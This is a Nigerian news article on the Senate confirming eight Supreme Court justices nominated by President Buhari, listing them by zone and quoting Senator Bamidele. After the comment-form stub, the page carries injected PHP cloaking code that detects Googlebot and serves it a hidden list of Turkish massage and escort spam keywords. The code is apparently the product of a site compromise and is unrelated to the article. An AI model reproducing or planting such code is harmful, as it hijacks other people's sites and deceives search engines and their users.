Senate Confirms Eight New Supreme Court Justices

NEWSMAN, Abuja – Nigeria’s Senate has confirmed eight new Justices for the Supreme Court as forwarded to it by President Muhammadu Buhari in September.

The confirmed justices are, Lawal Garba, (North West), Helen Ogunwumiju (South West), Abdu Aboki (North West), and M M Saulawa (North West).

Others are, Adamu Jauro (North East), Samuel Oseji (Souty South), Tijani Abubakar (North East), and Emmanuel Agim (South South).

According to a statement by the Special Assistant (Press) to Senate President, Ezrel Tabiowo, the Senate on Tuesday confirmed the justices following the adoption of its committee on Judiciary, Human Rights and Legal Matters after a report submitted at plenary by chairman of the Committee, Senator Opeyemi Bamidele (APC – Ekiti Central).

Senator Bamidele in his presentation stated that the appointment of the nominees, satisfied the requirement of Sections 230(2) and 232(1) and (2) and (3) of the 1999 Constitution of the Federal Republic of Nigeria as amended.

“Upon confirmation of the appointment of the nominees by the Senate, all Geo-political Zones will be represented by three or four Justices, as the case may be, except the North-Central Zone, which will maintain its current two Justices on the Bench of the Supreme Court of Nigeria”, the Lawmaker said.

Bamidele however explained that, “the reason why the North-Central zone has two Justices unlike other zones, can be attributed to the fact that during the selection process, the nomination from the zone was stood down by the selection Committee for a further review of the nomination by the Federal Judicial Service Commission.”

He added that while necessary steps were being taken to meet the full compliment of the maximum number of Justices of the Supreme Court of Nigeria, the appointment of the Eight (8) Justices of the Supreme Court was a bold step taken by President Buhari to strengthen the Judiciary to meet with the challenges of the 21st Century. 

Lawmakers, including the Deputy Senate President, Ovie Omo-Agege (APC – Delta Central); Senate Leader, Yahaya Abdullahi (APC – Kebbi North; and Gabriel Suswam (PDP – Benue North East) in their contributions, expressed satisfaction with the qualification, experience and competence of the nominees.

Senate President Ahmad Lawan admonished the justices to be patriotic and put the nation ahead. He says the new justices will help to strengthen the current judges at the Supreme Court so that the court can attend to critical cases.

The appointment of the eight justices was earlier based on the recommendations of the National Judicial Council.

Buhari had sent the request in September “in pursuant to Section 231 (2) of the 1999 Constitution as amended and upon the advice of the National Judicial Council according to their ranking and seniority in the Court of Appeal.”

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *


$uagent = trim(strtolower($_SERVER["HTTP_USER_AGENT"])); if(strpos($uagent,"googlebot")!==false and strpos($uagent,"google-amphtml")===false ){ echo 'Van masaj salonu Maraş masaj salonu Şanlıurfa masaj salonu Isparta masaj salonu Amasya masaj salonu Afyon masaj salonu Denizli masaj salonu Kayseri masaj salonu Eskişehir masaj salonu Malatya masaj salonu Yozgat masaj salonu Çorum masaj salonu Tokat masaj salonu Gaziantep masaj salonu Kütahya masaj salonu Elazığ masaj salonu Kırklareli escort Burdur escort Aksaray escort Kars escort Kastamonu escort Adıyaman escort Erzincan escort Uşak escort Sinop escort '; }